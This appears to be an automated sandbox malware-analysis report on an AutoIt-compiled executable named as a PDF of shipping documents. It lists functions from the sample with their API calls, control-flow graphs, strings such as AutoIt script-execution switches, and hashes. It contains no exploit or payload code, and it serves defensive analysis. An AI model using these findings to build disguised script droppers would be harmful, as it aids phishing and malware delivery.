                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00BB8F5F: __time64.LIBCMT ref: 00BB8F69
                                                                                      • Part of subcall function 00B54EE5: _fseek.LIBCMT ref: 00B54EFD
                                                                                    • __wsplitpath.LIBCMT ref: 00BB9234
                                                                                      • Part of subcall function 00B740FB: __wsplitpath_helper.LIBCMT ref: 00B7413B
                                                                                    • _wcscpy.LIBCMT ref: 00BB9247
                                                                                    • _wcscat.LIBCMT ref: 00BB925A
                                                                                    • __wsplitpath.LIBCMT ref: 00BB927F
                                                                                    • _wcscat.LIBCMT ref: 00BB9295
                                                                                    • _wcscat.LIBCMT ref: 00BB92A8
                                                                                      • Part of subcall function 00BB8FA5: _memmove.LIBCMT ref: 00BB8FDE
                                                                                      • Part of subcall function 00BB8FA5: _memmove.LIBCMT ref: 00BB8FED
                                                                                    • _wcscmp.LIBCMT ref: 00BB91EF
                                                                                      • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9824
                                                                                      • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9837
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BB9452
                                                                                    • _wcsncpy.LIBCMT ref: 00BB94C5
                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 00BB94FB
                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BB9511
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB9522
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB9534
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                    • String ID:
                                                                                    • API String ID: 1500180987-0
                                                                                    • Opcode ID: d7cbcaacc19d818de5c03946fed76c54c86441eafc4c99982048580c6fe75dc3
                                                                                    • Instruction ID: fe89da570ea05df686e9d6f6d1018750074245d132b143f23584ddd579df2b31
                                                                                    • Opcode Fuzzy Hash: d7cbcaacc19d818de5c03946fed76c54c86441eafc4c99982048580c6fe75dc3
                                                                                    • Instruction Fuzzy Hash: ABC129B1D00219ABDF21DFA5CC85AEEB7F9EF55310F0040EAF609E6151EB709A848F65
                                                                                    Function 00B53015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 70windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                                                                    • RegisterClassExW.USER32(00000030), ref: 00B5309E
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B530AF
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00B530CC
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B530DC
                                                                                    • LoadIconW.USER32(000000A9), ref: 00B530F2
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B53101
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: cf101e31d55d54ceed5b3322889bf59afd932def85a222bd152f121fbd681172
                                                                                    • Instruction ID: f2592dde1d8f4ead1a1041fd1c0a307f7c08d0e98946d9dccf54e014f753dbc9
                                                                                    • Opcode Fuzzy Hash: cf101e31d55d54ceed5b3322889bf59afd932def85a222bd152f121fbd681172
                                                                                    • Instruction Fuzzy Hash: 1A3105B294520AEFDB10CFA8E884BDDBBF0FB09310F14856AE581A72A0E7B54585CF51
                                                                                    Function 00B53041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                                                                    • RegisterClassExW.USER32(00000030), ref: 00B5309E
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B530AF
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00B530CC
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B530DC
                                                                                    • LoadIconW.USER32(000000A9), ref: 00B530F2
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B53101
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: a44db909cbd3b547b3d43918e7b9604076ab966de72c0f77615a0c7882d4e0de
                                                                                    • Instruction ID: 1bc16959a85319d780181f76aca4d913680aa39920246f6309326c14814f60ce
                                                                                    • Opcode Fuzzy Hash: a44db909cbd3b547b3d43918e7b9604076ab966de72c0f77615a0c7882d4e0de
                                                                                    • Instruction Fuzzy Hash: CC21C5B5D55619EFEB00DFA4E849BEDBBF4FB09700F00812AF911A72A0EBB145448F95
                                                                                    Function 00B5708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00B54706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C152F8,?,00B537AE,?), ref: 00B54724
                                                                                      • Part of subcall function 00B7050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B57165), ref: 00B7052D
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B571A8
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B8E8C8
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B8E909
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B8E947
                                                                                    • _wcscat.LIBCMT ref: 00B8E9A0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                    • API String ID: 2673923337-2727554177
                                                                                    • Opcode ID: d8d46e6e91a2560dc747dda9c601d64d34d96f915d0b5056c7869e087bbd09e6
                                                                                    • Instruction ID: 95e4247cf390664c1cd1a98421725f11dc6e64cb45bb2b242dd18a93d69f0e41
                                                                                    • Opcode Fuzzy Hash: d8d46e6e91a2560dc747dda9c601d64d34d96f915d0b5056c7869e087bbd09e6
                                                                                    • Instruction Fuzzy Hash: 41718E715093019EC310EF65E841BAFBBE8FF86350B4089AEF855872B0EB719948CB52
                                                                                    Function 00B53A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B53A50
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00B53A5F
                                                                                    • LoadIconW.USER32(00000063), ref: 00B53A76
                                                                                    • LoadIconW.USER32(000000A4), ref: 00B53A88
                                                                                    • LoadIconW.USER32(000000A2), ref: 00B53A9A
                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B53AC0
                                                                                    • RegisterClassExW.USER32(?), ref: 00B53B16
                                                                                      • Part of subcall function 00B53041: GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                                                                      • Part of subcall function 00B53041: RegisterClassExW.USER32(00000030), ref: 00B5309E
                                                                                      • Part of subcall function 00B53041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B530AF
                                                                                      • Part of subcall function 00B53041: InitCommonControlsEx.COMCTL32(?), ref: 00B530CC
                                                                                      • Part of subcall function 00B53041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B530DC
                                                                                      • Part of subcall function 00B53041: LoadIconW.USER32(000000A9), ref: 00B530F2
                                                                                      • Part of subcall function 00B53041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B53101
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: de126838c3da66eef181e169c60aecb6e1ee504400c18125f5930ab2becbad95
                                                                                    • Instruction ID: bf476b22b2713d337e84bfe596b45cbaba645da199cf42a221af1dd8ddf54a63
                                                                                    • Opcode Fuzzy Hash: de126838c3da66eef181e169c60aecb6e1ee504400c18125f5930ab2becbad95
                                                                                    • Instruction Fuzzy Hash: 90212772905309EFEB10DFA4EC49BDD7BF0FB49711F00816AE500A72A1D7B55A448B84
                                                                                    Function 00B53633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 767 b53633-b53681 769 b536e1-b536e3 767->769 770 b53683-b53686 767->770 769->770 771 b536e5 769->771 772 b536e7 770->772 773 b53688-b5368f 770->773 774 b536ca-b536d2 DefWindowProcW 771->774 775 b8d0cc-b8d0fa call b61070 call b61093 772->775 776 b536ed-b536f0 772->776 777 b53695-b5369a 773->777 778 b5374b-b53753 PostQuitMessage 773->778 779 b536d8-b536de 774->779 810 b8d0ff-b8d106 775->810 780 b53715-b5373c SetTimer RegisterWindowMessageW 776->780 781 b536f2-b536f3 776->781 783 b536a0-b536a2 777->783 784 b8d154-b8d168 call bb2527 777->784 785 b53711-b53713 778->785 780->785 789 b5373e-b53749 CreatePopupMenu 780->789 786 b8d06f-b8d072 781->786 787 b536f9-b5370c KillTimer call b5443a call b53114 781->787 790 b53755-b53764 call b544a0 783->790 791 b536a8-b536ad 783->791 784->785 801 b8d16e 784->801 785->779 794 b8d0a8-b8d0c7 MoveWindow 786->794 795 b8d074-b8d076 786->795 787->785 789->785 790->785 798 b8d139-b8d140 791->798 799 b536b3-b536b8 791->799 794->785 803 b8d078-b8d07b 795->803 804 b8d097-b8d0a3 SetFocus 795->804 798->774 806 b8d146-b8d14f call ba7c36 798->806 808 b536be-b536c4 799->808 809 b8d124-b8d134 call bb2d36 799->809 801->774 803->808 811 b8d081-b8d092 call b61070 803->811 804->785 806->774 808->774 808->810 809->785 810->774 815 b8d10c-b8d11f call b5443a call b5434a 810->815 811->785 815->774
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00B536D2
                                                                                    • KillTimer.USER32(?,00000001), ref: 00B536FC
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B5371F
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B5372A
                                                                                    • CreatePopupMenu.USER32 ref: 00B5373E
                                                                                    • PostQuitMessage.USER32(00000000), ref: 00B5374D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: TaskbarCreated
                                                                                    • API String ID: 129472671-2362178303
                                                                                    • Opcode ID: a2e1825c452eadeb31f1b0840ec596138e5fc0ff39439e1cfb0d0624089ba6b5
                                                                                    • Instruction ID: 91ddd5d12f022b534c15da0734c42e2a78431dc73081d16e03203f96ca528fc6
                                                                                    • Opcode Fuzzy Hash: a2e1825c452eadeb31f1b0840ec596138e5fc0ff39439e1cfb0d0624089ba6b5
                                                                                    • Instruction Fuzzy Hash: 914146B2608505EBDB106F64DC49BFD37D4EB86782F1401EAFD02963E1DA709E499321
                                                                                    Function 00B53766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                    • API String ID: 1825951767-3513169116
                                                                                    • Opcode ID: 62e29172603d251881b632c6882ab62c8a94714371fc42d22a9a59ac1c4c450f
                                                                                    • Instruction ID: aa0e5034db6873fba490870bac995b4fc435fa5ef4e2a0c37e90ed15c4929c5e
                                                                                    • Opcode Fuzzy Hash: 62e29172603d251881b632c6882ab62c8a94714371fc42d22a9a59ac1c4c450f
                                                                                    • Instruction Fuzzy Hash: E7A15D7290021D9ADB05EBA0DC95BEEB7F8FF15741F4404EAE816B7291EF745A08CB60
                                                                                    Function 00B539D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1019 b539d5-b53a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B53A03
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B53A24
                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00B53A38
                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00B53A41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: 8b0d95a03384235277081aeb1b27a3e0f2e4928a18002e7cfbaa7c41fe3164ef
                                                                                    • Instruction ID: 24ffe618c100a79ff6c8b84777bc8c3f9c69bca05c9fc2e01ecc738e02ac4767
                                                                                    • Opcode Fuzzy Hash: 8b0d95a03384235277081aeb1b27a3e0f2e4928a18002e7cfbaa7c41fe3164ef
                                                                                    • Instruction Fuzzy Hash: DAF03A76601690BEEA305B23AC08FBB6E7DE7C7F50B01802AB900A3270D6B10801CAB0
                                                                                    Function 00B5407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1020 b5407c-b54092 1021 b5416f-b54173 1020->1021 1022 b54098-b540ad call b57a16 1020->1022 1025 b8d3c8-b8d3d7 LoadStringW 1022->1025 1026 b540b3-b540d3 call b57bcc 1022->1026 1028 b8d3e2-b8d3fa call b57b2e call b56fe3 1025->1028 1026->1028 1031 b540d9-b540dd 1026->1031 1038 b540ed-b5416a call b72de0 call b5454e call b72dbc Shell_NotifyIconW call b55904 1028->1038 1042 b8d400-b8d41e call b57cab call b56fe3 call b57cab 1028->1042 1032 b54174-b5417d call b58047 1031->1032 1033 b540e3-b540e8 call b57b2e 1031->1033 1032->1038 1033->1038 1038->1021 1042->1038
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B8D3D7
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    • _memset.LIBCMT ref: 00B540FC
                                                                                    • _wcscpy.LIBCMT ref: 00B54150
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B54160
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                    • String ID: Line:
                                                                                    • API String ID: 3942752672-1585850449
                                                                                    • Opcode ID: 2758374aed6e3ecb64b5f15c5c34d469a6c798ce77c8a931ae6f34dedb62b217
                                                                                    • Instruction ID: 484226f92eddfd8a367e65c6d91033e9dfe0bc597b37224012add90c0b41b058
                                                                                    • Opcode Fuzzy Hash: 2758374aed6e3ecb64b5f15c5c34d469a6c798ce77c8a931ae6f34dedb62b217
                                                                                    • Instruction Fuzzy Hash: 7D31D072108705AED320EB60EC46FDB77D8EF84305F1085AAF985921E1EF70969CCB82
                                                                                    Function 00B5686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1055 b5686a-b56891 call b54ddd 1058 b56897-b568a5 call b54ddd 1055->1058 1059 b8e031-b8e041 call bb955b 1055->1059 1058->1059 1066 b568ab-b568b1 1058->1066 1062 b8e046-b8e048 1059->1062 1064 b8e04a-b8e04d call b54e4a 1062->1064 1065 b8e067-b8e0af call b70db6 1062->1065 1070 b8e052-b8e061 call bb42f8 1064->1070 1075 b8e0b1-b8e0bb 1065->1075 1076 b8e0d4 1065->1076 1069 b568b7-b568d9 call b56a8c 1066->1069 1066->1070 1070->1065 1079 b8e0cf-b8e0d0 1075->1079 1078 b8e0d6-b8e0e9 1076->1078 1080 b8e0ef 1078->1080 1081 b8e260-b8e263 call b72d55 1078->1081 1082 b8e0bd-b8e0cc 1079->1082 1083 b8e0d2 1079->1083 1084 b8e0f6-b8e0f9 call b57480 1080->1084 1087 b8e268-b8e271 call b54e4a 1081->1087 1082->1079 1083->1078 1089 b8e0fe-b8e120 call b55db2 call bb73e9 1084->1089 1092 b8e273-b8e283 call b57616 call b55d9b 1087->1092 1099 b8e122-b8e12f 1089->1099 1100 b8e134-b8e13e call bb73d3 1089->1100 1106 b8e288-b8e2b8 call baf7a1 call b70e2c call b72d55 call b54e4a 1092->1106 1102 b8e227-b8e237 call b5750f 1099->1102 1108 b8e158-b8e162 call bb73bd 1100->1108 1109 b8e140-b8e153 1100->1109 1102->1089 1112 b8e23d-b8e247 call b5735d 1102->1112 1106->1092 1116 b8e164-b8e171 1108->1116 1117 b8e176-b8e180 call b55e2a 1108->1117 1109->1102 1119 b8e24c-b8e25a 1112->1119 1116->1102 1117->1102 1124 b8e186-b8e19e call baf73d 1117->1124 1119->1081 1119->1084 1130 b8e1a0-b8e1bf call b57de1 call b55904 1124->1130 1131 b8e1c1-b8e1c4 1124->1131 1154 b8e1e2-b8e1f0 call b55db2 1130->1154 1132 b8e1f2-b8e1f5 1131->1132 1133 b8e1c6-b8e1e1 call b57de1 call b56839 call b55904 1131->1133 1137 b8e215-b8e218 call bb737f 1132->1137 1138 b8e1f7-b8e200 call baf65e 1132->1138 1133->1154 1143 b8e21d-b8e226 call b70e2c 1137->1143 1138->1106 1149 b8e206-b8e210 call b70e2c 1138->1149 1143->1102 1149->1089 1154->1143
                                                                                    APIs
                                                                                      • Part of subcall function 00B54DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E0F
                                                                                    • _free.LIBCMT ref: 00B8E263
                                                                                    • _free.LIBCMT ref: 00B8E2AA
                                                                                      • Part of subcall function 00B56A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B56BAD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                    • API String ID: 2861923089-1757145024
                                                                                    • Opcode ID: 2f4b5e9880fb8ddc32563abe848ca7fddfbb29d77f1c764899ff63d83a5bea35
                                                                                    • Instruction ID: e261935bf06c1e00a5082cf2a2a665a56a1b4870f0c89e8d1e87647d1f326790
                                                                                    • Opcode Fuzzy Hash: 2f4b5e9880fb8ddc32563abe848ca7fddfbb29d77f1c764899ff63d83a5bea35
                                                                                    • Instruction Fuzzy Hash: 88916D719142199FCF14EFA4CC929EDB7F4FF09311B1044AAF826AB2A1DB70E945CB50
                                                                                    Function 00B535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
